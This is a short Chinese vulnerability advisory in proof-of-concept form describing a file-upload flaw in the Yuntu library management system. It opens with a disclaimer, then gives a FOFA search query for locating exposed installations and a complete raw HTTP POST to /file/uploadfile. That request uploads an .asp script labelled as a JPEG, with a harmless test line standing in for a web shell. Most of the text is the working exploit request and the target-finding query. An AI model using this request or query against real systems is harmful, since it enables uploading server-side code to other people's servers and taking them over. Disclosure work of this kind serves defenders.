免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
一、漏洞简介
云图图书馆集成管理系统是一套基于aspx的图书馆里系统,该系统存在文件上传漏洞,攻击者可获取服务器权限。
二、影响版本
云图图书馆集群管理系统
三、资产测绘
fofa:body=“Login/scanwxusr”
四、漏洞复现
POST /file/uploadfile HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=00content0boundary00
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 176
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="vezvf.asp"
Content-Type: image/jpeg
<%Response.Write("test")%>
--00content0boundary00--